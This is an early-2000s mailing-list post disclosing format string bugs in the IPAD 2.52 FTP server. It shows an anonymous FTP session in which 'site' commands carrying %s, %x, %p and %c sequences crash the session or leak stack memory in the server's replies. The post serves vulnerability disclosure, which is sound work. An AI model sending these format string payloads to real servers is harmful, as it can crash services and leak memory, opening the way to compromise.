Date: Sat, 17 Feb 2001 15:03:35 -0000
From: diab <[email protected]>
To: [email protected]Subject: Multi format string bugs in IPAD x.x ftp server
Hi ppl,
There appears to be multiple format string bug's
in IPAD x.x ftp server. Here are some
examples with the 'site' command:
[diab@epuj diab]$ ftp xxx.xxx.xxx.xxx
Connected to xxx.xxx.xxx.xxx.
220 xxx.xxx.xxx.xxx FTP server (IPAD 2.52) ready
at Wed Feb 14 16:08:08 2001
Name (xxx.xxx.xxx.xxx:diab): anonymous
331 Anonymous logins ok. Please enter your e-mail
address as password.
Password:
230 User anonymous logged in.
Remote system type is MSDOS.
ftp> site %s%s%s%s%s%s%s%s%s%s%s%s%s%s
Segmentation fault
[diab@epuj diab]$
or:
ftp> site %x%x%x%x%x%x%x%x%x%x%x
500 Unknown command 'site
8057478806014080635400bfffcc78455449532578252025782578257825782578257825782578'
or:
ftp> site %p%p
500 Unknown command
'8067efc680000184013dab8684013db98'
or:
ftp> site %c%c%c%c
500 Unknown command
'2570(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)0x4
etc
ftp> quit
500 Unknown command 'site
0.0000000.00000098099176241206326244409344.000000'
[diab@epuj diab]$
Anyway I thought I might bring this issue to some
people's attention.
bye,
- diab
